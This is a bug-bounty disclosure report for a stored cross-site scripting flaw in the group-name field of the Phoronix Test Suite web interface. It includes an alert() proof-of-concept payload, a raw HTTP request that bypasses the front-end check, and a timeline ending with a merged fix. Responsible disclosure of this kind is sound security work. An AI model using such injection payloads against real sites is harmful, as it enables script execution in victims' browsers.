Cross-site Scripting (XSS) - Stored in phoronix-test-suite/phoronix-test-suite

Valid

Reported on

Jan 4th 2022


Description

Hi there phoronix test suite maintainer team. There is a stored XSS in phoronix-test-suite source code. This is in group name.

Proof of Concept

  1. Install a local instance of phoronix test suite
  2. Create an account and log in, then create a group with name <img src=a onerror=alert(1)>. Note that you cannot create this on the UI because JavaScript to forbid this is implemented. To do that, you need a tool like Burp Suite to bypass frontend check and create system group directly. A request for creating group with specials would look like this:
POST /?systems HTTP/1.1
Host: {phoronix}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: {phoronix}
Connection: close
Referer:{phoronix}?systems
Cookie: PHPSESSID=blfirmens92e3129mt1lsjt3m6; pts_websocket_server=ws%3A%2F%2F127.0.1.1%3A8427%2F
Upgrade-Insecure-Requests: 1

new_group=1235<img+src=a+onerror=alert(1)>
  1. After creating the system group, go back to /?systems and see that an alert pops up.

Impact

This vulnerability is capable of stored XSS.

We are processing your report and will contact the phoronix-test-suite team within 24 hours. 25 days ago
We have contacted a member of the phoronix-test-suite team and are waiting to hear back 24 days ago
We have sent a follow up to the phoronix-test-suite team. We will try again in 7 days. 21 days ago
phoronix-test-suite/phoronix-test-suite maintainer validated this vulnerability 19 days ago
M0rphling has been awarded the disclosure bounty
The fix bounty is now up for grabs
phoronix-test-suite/phoronix-test-suite maintainer confirmed that a fix has been merged on 56fd0a 19 days ago
The fix bounty has been dropped